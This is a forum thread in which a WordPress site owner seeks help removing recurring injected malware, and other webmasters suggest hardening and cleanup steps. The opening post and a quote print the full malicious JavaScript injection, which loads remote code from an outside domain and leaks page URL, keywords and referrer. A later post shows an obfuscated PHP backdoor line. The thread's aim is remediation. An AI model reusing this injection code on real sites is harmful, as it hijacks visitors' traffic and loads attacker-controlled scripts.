GoFuckYourself.com - Adult Webmaster Forum

GoFuckYourself.com - Adult Webmaster Forum (https://gfy.com/index.php)
-   Fucking Around & Business Discussion (https://gfy.com/forumdisplay.php?f=26)
-   -   Scripts inserted in my WP themes header (https://gfy.com/showthread.php?t=1227874)

ravenazrael 11-09-2016 08:17 AM

Scripts inserted in my WP themes header
 
somehow some scripts are placed in my them header that contain malware and redirect traffic to other sites
I changed themes 3 times, got hosting scan the malaware, which they did and delet, but it happens every day. It points to different sites. some were adult dating sites. below a sample.
How can I get rid of these things? it has costed memoney to fix some stuff and also lost over half of my traffic

<script>var a='';setTimeout(1);function setCookie(a,b,c){var d=new Date;d.setTime(d.getTime()+60*c*60*1e3);var e="expires="+d.toUTCString();document.cookie=a+"=" +b+"; "+e}function getCookie(a){for(var b=a+"=",c=document.cookie.split(";"),d=0;d<c.lengt h;d++){for(var e=c[d];" "==e.charAt(0);)e=e.substring(1);if(0==e.indexOf(b ))return e.substring(b.length,e.length)}return null}null==getCookie("__cfgoid")&&(setCookie("__cf goid",1,1),1==getCookie("__cfgoid")&&(setCookie("_ _cfgoid",2,1),document.write('<script type="text/javascript" src="' + 'http://bekcelerotomotiv.com/js/jquery.min.php' + '?key=b64' + '&utm_campaign=' + 'G91825' + '&utm_source=' + window.location.host + '&utm_medium=' + '&utm_content=' + window.location + '&utm_term=' + encodeURIComponent(((k=(function(){var keywords = '';var metas = document.getElementsByTagName('meta');if (metas) {for (var x=0,y=metas.length; x<y; x++) {if (metas[x].name.toLowerCase() == "keywords") {keywords += metas[x].content;}}}return keywords !== '' ? keywords : null;})())==null?(v=window.location.search.match(/utm_term=([^&]+)/))==null?(t=document.title)==null?'':t:v[1]:k)) + '&se_referrer=' + encodeURIComponent(document.referrer) + '"><' + '/script>')));</script>

Brian mike 11-09-2016 08:42 AM

Quote:

Originally Posted by ravenazrael (Post 21286612)
somehow some scripts are placed in my them header that contain malware and redirect traffic to other sites
I changed themes 3 times, got hosting scan the malaware, which they did and delet, but it happens every day. It points to different sites. some were adult dating sites. below a sample.
How can I get rid of these things? it has costed memoney to fix some stuff and also lost over half of my traffic

<script>var a='';setTimeout(1);function setCookie(a,b,c){var d=new Date;d.setTime(d.getTime()+60*c*60*1e3);var e="expires="+d.toUTCString();document.cookie=a+"=" +b+"; "+e}function getCookie(a){for(var b=a+"=",c=document.cookie.split(";"),d=0;d<c.lengt h;d++){for(var e=c[d];" "==e.charAt(0);)e=e.substring(1);if(0==e.indexOf(b ))return e.substring(b.length,e.length)}return null}null==getCookie("__cfgoid")&&(setCookie("__cf goid",1,1),1==getCookie("__cfgoid")&&(setCookie("_ _cfgoid",2,1),document.write('<script type="text/javascript" src="' + 'http://bekcelerotomotiv.com/js/jquery.min.php' + '?key=b64' + '&utm_campaign=' + 'G91825' + '&utm_source=' + window.location.host + '&utm_medium=' + '&utm_content=' + window.location + '&utm_term=' + encodeURIComponent(((k=(function(){var keywords = '';var metas = document.getElementsByTagName('meta');if (metas) {for (var x=0,y=metas.length; x<y; x++) {if (metas[x].name.toLowerCase() == "keywords") {keywords += metas[x].content;}}}return keywords !== '' ? keywords : null;})())==null?(v=window.location.search.match(/utm_term=([^&]+)/))==null?(t=document.title)==null?'':t:v[1]:k)) + '&se_referrer=' + encodeURIComponent(document.referrer) + '"><' + '/script>')));</script>

Do you use ad network ? I mean are you a publisher ? This could be the way they get in your site.
Without accuse any company you should look into this too.

Fetish Gimp 11-09-2016 09:14 AM

I would suggest:
  • Make sure you're running updated Wordpress installations, and that all your plugins are updated.
  • If you're running any plugins that are not from the Wordpress repository, disable them. Enable them one at a time and check to see if the malicious code comes back.
  • Check that all Wordpress users with admin privileges are ones you know should exist, and change their passwords just in case.
  • Change your FTP user/passwords.

Check out these links on making Wordpress more secure:
https://codex.wordpress.org/Hardening_WordPress
Securing WordPress: Hardening Basics | The State of Security
https://www.wordfence.com/learn/how-...rdpress-sites/

ravenazrael 11-09-2016 09:33 AM

Thanks. everything started when I used an ad networks script months ago, then stopped, then cleaned the whole site, but it has been returning many many times

All plugins are from WP repository. The problem is that the issue happens every day or every two days so running without a plug in per day test may end like next year and still it may harm the website.
the 3 admins are me and the developers I had to hire to fix the issue. no one else has logged in to the site as admin in the past weeks

is there a way to block scripts?

Brian mike 11-09-2016 09:40 AM

Can you check on your Jetpact stats and tell me if you see outbound click going to url like this : 01.wp.com etc ... if anything look similar?
Many think those are legit outbound but THEY ARE NOT. :) i mean we have discover Hacked file with the above URL or similar.

Also check webmaster/ tools USER owner property. if anyone new have been added as owner. Been hacked this way before.

ravenazrael 11-09-2016 11:32 AM

Quote:

Originally Posted by Brian mike (Post 21286942)
Can you check on your Jetpact stats and tell me if you see outbound click going to url like this : 01.wp.com etc ... if anything look similar?
Many think those are legit outbound but THEY ARE NOT. :) i mean we have discover Hacked file with the above URL or similar.

Also check webmaster/ tools USER owner property. if anyone new have been added as owner. Been hacked this way before.

nope, none of them show anything

Colmike9 11-09-2016 11:35 AM

Find out what program and with what refID they're sending traffic to, then report them to that program so that they get canned and not paid.. :winkwink:

ravenazrael 11-09-2016 11:38 AM

Quote:

Originally Posted by Colmike7 (Post 21287356)
Find out what program and with what refID they're sending traffic to, then report them to that program so that they get canned and not paid.. :winkwink:

i will do that, but still that may not stop them to do it, as they might just go to other affiliates. is there a way to block a specific script? regardless of the url?

Brian mike 11-09-2016 11:44 AM

Quote:

Originally Posted by ravenazrael (Post 21287362)
i will do that, but still that may not stop them to do it, as they might just go to other affiliates. is there a way to block a specific script? regardless of the url?

Talk to Roby https://gfy.com/business-services/122...l#post21246502

At this point if your tech can't fix it try another one mate. Or worst case change Theme. :thumbsup

Good Luck and keep us posted :)

Colmike9 11-09-2016 11:54 AM

Quote:

Originally Posted by ravenazrael (Post 21287362)
i will do that, but still that may not stop them to do it, as they might just go to other affiliates. is there a way to block a specific script? regardless of the url?

I have one way to block the script without removing it, but it's stupid so I won't post it..


Try removing the script, then change your cPanel and WP passwords, "harden" WP if you know how, remove plugins and themes that you don't use anymore, make sure file permissions are set right, see if there are any weird fake files added like jquery.min.php or .ftpquote, check uploads folder for things that don't belong, and sometimes people with this issue have resolved it with something called Sucuri.

Hope this helps.

Brian mike 11-09-2016 11:59 AM

Colmike your link is VIrusssssssssssss

DONT CLICK THIS LINK see bellow why

https://s16.postimg.org/qz1f1s991/Untitled.jpg

Colmike9 11-09-2016 12:04 PM

Quote:

Originally Posted by Brian mike (Post 21287422)
Colmike your link is VIrusssssssssssss

DONT CLICK THIS LINK see bellow why

https://s16.postimg.org/qz1f1s991/Untitled.jpg

I removed it, but that was just sucuri.net showing the malware in plain text.

ravenazrael 11-09-2016 01:03 PM

ok thanks.. will let you know if something of this works out

Google Expert 11-09-2016 01:13 PM

We used to have exactly same thing. Even managed to track down the fucking russian down to his home address.

We tried EVERYTHING to get rid of it. And the only thing that worked was a complete server wipe.

They inject their code through some shitty wp plugin, and then the virus spreads everywhere on your system. Even limiting server access by IP firewall didn't help. Had to wipe/format the server.

ravenazrael 11-09-2016 01:30 PM

Quote:

Originally Posted by Google Expert (Post 21287599)
We used to have exactly same thing. Even managed to track down the fucking russian down to his home address.

We tried EVERYTHING to get rid of it. And the only thing that worked was a complete server wipe.

They inject their code through some shitty wp plugin, and then the virus spreads everywhere on your system. Even limiting server access by IP firewall didn't help. Had to wipe/format the server.

thanks. I'll need to get someone to do that.

Bama 11-09-2016 02:09 PM

If you have downloaded a theme and it has encrypted ANYTHING on it, that is probably the source of the problem.

Relic 11-09-2016 02:13 PM

That's what you get not keeping software up to date, op.

PornAffiliate 11-09-2016 02:25 PM

You probably already have tried some malware plugins - but if you havent tried this one I would give it a go: https://wordpress.org/plugins/gotmls/

ravenazrael 11-09-2016 08:45 PM

thanks guys and tahnsk for the recommendations.
a i am not tech savy and the person helping me is MIA i tried to find the issue myself
what is the dirs.php file supposed to do?
i think that is one of the issues. it has crap like this one
${S8TWxbKKKF("8Cw8}y27>v#")} = ${VpyOMClU(";ZC0b:wf~")}(Array(S8TWxbKKKF("2?@=") => Array(RoPOn5JDKcTm("70@5=3") => XcNWgTqO("xx}!"), HQZTMCcx4OL("20-13A") => S8TWxbKKKF("k::A3=D\\FLD:bI-=>;943G=D8XDXEFG\\8BFBU@>93=3@688"), S8TWxbKKKF("-::A3=D") => $content)));

ravenazrael 11-09-2016 09:34 PM

what does it mean when wordfence tells you that somebody came to your site and tried to access non existent page. the non-existent pages are not real pages...
http://www.boobsrealm.com/wp-content.../wordfence.png

Fetish Gimp 11-09-2016 09:58 PM

Quote:

Originally Posted by ravenazrael (Post 21288850)
what is the dirs.php file supposed to do?
i think that is one of the issues. it has crap like this one
${S8TWxbKKKF("8Cw8}y27>v#")} = ${VpyOMClU(";ZC0b:wf~")}(Array(S8TWxbKKKF("2?@=") => Array(RoPOn5JDKcTm("70@5=3") => XcNWgTqO("xx}!"), HQZTMCcx4OL("20-13A") => S8TWxbKKKF("k::A3=D\\FLD:bI-=>;943G=D8XDXEFG\\8BFBU@>93=3@688"), S8TWxbKKKF("-::A3=D") => $content)));

Wordpress itself does not have any such file.

If you found that file on the root directory of your Wordpress install, and you're sure that all your plugins are safe, then it is highly likely access to your server has been compromised.

I would suggest trying this, in this order:
  1. Change all your server-related user/passwords (ftp/cpanel, ssh)
  2. Change all your Wordpress passwords
  3. Delete the dirs.php file you found

If the script issue persists after all that, then your problem is as serious as Google Expert's because infected files are hidden somewhere else in your server.

Colmike9 11-09-2016 10:36 PM

Quote:

Originally Posted by ravenazrael (Post 21288916)
what does it mean when wordfence tells you that somebody came to your site and tried to access non existent page. the non-existent pages are not real pages...
http://www.boobsrealm.com/wp-content.../wordfence.png

Probably a bot checking sites for backdoors and/or other vulnerabilities..

There are others, too, like if you see a bunch of random.com/something/feed showing up then that's a bot looking for content to scrape.

lezinterracial 11-09-2016 11:48 PM

Quote:

Originally Posted by ravenazrael (Post 21288916)
what does it mean when wordfence tells you that somebody came to your site and tried to access non existent page. the non-existent pages are not real pages...
http://www.boobsrealm.com/wp-content.../wordfence.png

That doesn't look malicious to me. Looks like your css in your theme is looking for a font that is in your theme that it can't find.

I would search "fonts/fontawesome-webfont.woff2 found" or "themes/redwave-lite/fonts/fontawesome-webfont.woff?version=4.3.0"

If you want to fix this error. You may want to look for your hack though.



Are you on shared hosting? Can you find when your file is getting changed? Maybe check the site log for when the hacked file is getting updated.

Did you change your ftp password like Fetish Gimp mentioned? Did you change your wordpress password?

I like to rename wp-login.php to something else and change it back only when I need to make an update. I don't think this will help you, but may be worth a try.

jscott 11-10-2016 01:56 AM

ravenazrael, you are in for a big surprise. This shit has been hitting my sites for months, it's no easy cleanup. Sometimes they can make your sites appear to be normal while stealing all your Google traffic too.

https://aw-snap.info/file-viewer/
I found this online website scanning tool very helpful

This is a terrible, terrible thing :( Good luck getting it fixed

ravenazrael 11-10-2016 02:07 AM

Thanks to everybody!
Yes it has been hitting me for months and it looked normal for a while. my traffic has gone to 1/3 now

just a punk 11-10-2016 02:15 AM

Quote:

Originally Posted by Bama (Post 21287839)
If you have downloaded a theme and it has encrypted ANYTHING on it, that is probably the source of the problem.

According to the reports I read, over 90% of all "nulled" plugins and themes that float on the pirate sites and torrents have a backdoor.

ravenazrael 11-10-2016 06:59 AM

Quote:

Originally Posted by CyberSEO (Post 21289216)
According to the reports I read, over 90% of all "nulled" plugins and themes that float on the pirate sites and torrents have a backdoor.

all plugins were download from the WP repository... files were cleared... but script returned again =(

Brian mike 11-10-2016 07:20 AM

Quote:

Originally Posted by ravenazrael (Post 21289759)
all plugins were download from the WP repository... files were cleared... but script returned again =(

Blame Donald Trump :winkwink: ( Joke aside trying to make you smile for 5 sec. ) :) I feel you mate, do you think its time to wipe out ?

I have my part of problem also, moving server is a Bitch.... Hitting my head on my desk for the last 72 hours :mad: grrrrr.

At least you know where the problem come from, i suggest you to TAKE Big action to wipe it out.

ravenazrael 11-10-2016 09:14 AM

Quote:

Originally Posted by Brian mike (Post 21289792)
Blame Donald Trump :winkwink: ( Joke aside trying to make you smile for 5 sec. ) :) I feel you mate, do you think its time to wipe out ?

I have my part of problem also, moving server is a Bitch.... Hitting my head on my desk for the last 72 hours :mad: grrrrr.

At least you know where the problem come from, i suggest you to TAKE Big action to wipe it out.

by wipe out you mean the whole site and content?? =(

Fetish Gimp 11-10-2016 10:16 AM

Quote:

Originally Posted by ravenazrael (Post 21290125)
by wipe out you mean the whole site and content?? =(

I believe what he means is that you back-up your database and image/video files, and wipe the server clean. Change all passwords, and reinstall your backed up files.

One thing you might wanna do is to search your Wordpress database(s)for any scripts that might have been injected into it. Search for any <script> tags and strings from the script that keeps getting injected just in case they've been saved into the database so that whenever Wordpress runs, they get put back in.

ravenazrael 11-10-2016 10:28 AM

Quote:

Originally Posted by Fetish Gimp (Post 21290299)
I believe what he means is that you back-up your database and image/video files, and wipe the server clean. Change all passwords, and reinstall your backed up files.

One thing you might wanna do is to search your Wordpress database(s)for any scripts that might have been injected into it. Search for any <script> tags and strings from the script that keeps getting injected just in case they've been saved into the database so that whenever Wordpress runs, they get put back in.

thanks. well that was done before... two months ago.. and the problem persisted

ravenazrael 11-13-2016 05:47 PM

seems it is finally solved. thanks to you all!

jscott 11-14-2016 12:06 AM

oh it's never solved :(

klinton 11-14-2016 02:17 AM

so how did you fix it ? :)
Quote:

Originally Posted by ravenazrael (Post 21298330)
seems it is finally solved. thanks to you all!


PornDiscounts-V 11-14-2016 02:22 AM

They may likely made many backdoor shells. Beat bet is to format, then import only posts from old database on fresh install.

MichaelA2014 11-14-2016 09:33 PM

Back up only post content and images. nothing else. Then do a clean install. Most likely you got that code when you 'tried' one of those nulled plugins from blackhat forums or let one of those bargain freelancers work on your site.

j3rkules 11-15-2016 04:43 AM

Quote:

Originally Posted by klinton (Post 21298855)
so how did you fix it ? :)

I am also curious after reading all of this.

Google Expert 11-15-2016 05:37 AM

Quote:

Originally Posted by ravenazrael (Post 21289759)
all plugins were download from the WP repository... files were cleared... but script returned again =(

I already told you. The script infected all your server.

You need format HDD and do a clean OS install.

Other than this, nothing will help.

Paz 11-15-2016 07:11 AM

Quote:

Originally Posted by Google Expert (Post 21301891)
I already told you. The script infected all your server.

You need format HDD and do a clean OS install.

Other than this, nothing will help.

This isn't true. You can update plugins themes, run malware scanners and update all your passwords then install a Better Security plugin. It's a pain but much quicker than a format and clean install.

ravenazrael 11-15-2016 07:53 AM

Quote:

Originally Posted by Paz (Post 21302011)
This isn't true. You can update plugins themes, run malware scanners and update all your passwords then install a Better Security plugin. It's a pain but much quicker than a format and clean install.

yep.. that is what worked.. so far
I actually never downloaded any plugin or script from BHW. i remember it all started when I inserted a script from a well-known ad network. Not sure if it triggered it or was coincidence

ErectMedia 11-15-2016 04:24 PM

Basics....

https://ithemes.com/2016/10/13/how-t...ly-and-easily/

Good plugin...

https://wordpress.org/plugins/all-in...-and-firewall/

If that doesn't do it could route DNS through Incapsula to kill off some bad shit before it even gets to your server. CloudFlare more popular and a good CDN but in terms of security Incapsula's free plan blocks more bad shit out than CloudFlare's paid plan. :2 cents:

Shoplifter 11-15-2016 04:56 PM

It is possible to clean out a hacked Wordpress setup and indeed I have done it.

One thing that may help you is this: find /pathtoyourfiles/yourblog.com -mtime -2 -ls

It will list all of the files that have been modified in the past two days, which is very helpful in catching backdoor shell scripts and files being placed on your server.

If the attacker is using your site to send spam emails it's easy to find the originating script from the email header. Then you can delete it and also search in your logs for other scripts being used to send email. Usually the attacker will have three systems going, one is the actual backdoor that allows him to place files on your server, the other are the scripts that they use to send spam emails, and the other is a page on your website that acts as an endpoint for the URLs in his spam emails. This is the classic attack these days and once you can wrap your head around what they are trying to so it's a lot easier to prevent it.

It can also help if you use something like wordfence which will catch some but not all of the problems. Also keep your plugins up to date and delete any old plugins and themes.

ravenazrael 11-15-2016 07:44 PM

thank you! I hope all this also helps somebody else who may have similar issues in the future

Google Expert 11-15-2016 09:23 PM

Quote:

Originally Posted by Paz (Post 21302011)
This isn't true. You can update plugins themes, run malware scanners and update all your passwords then install a Better Security plugin. It's a pain but much quicker than a format and clean install.

Do you understand that he injected the code everywhere outside the WordPress?

We had spend 6 months trying to clean it out from our server. It would always come back. In the end we had to format HD and reinstall OS.

P.S.
they also try to hide their presence by redirecting certain countries only. So you may be viewing the site and thinking that all is good, while people from other countries are being redirected to his doorway pages.


All times are GMT -7. The time now is 04:27 PM.

Powered by vBulletin® Version 3.8.8
Copyright ©2000 - 2025, vBulletin Solutions, Inc.
©2000-, AI Media Network Inc123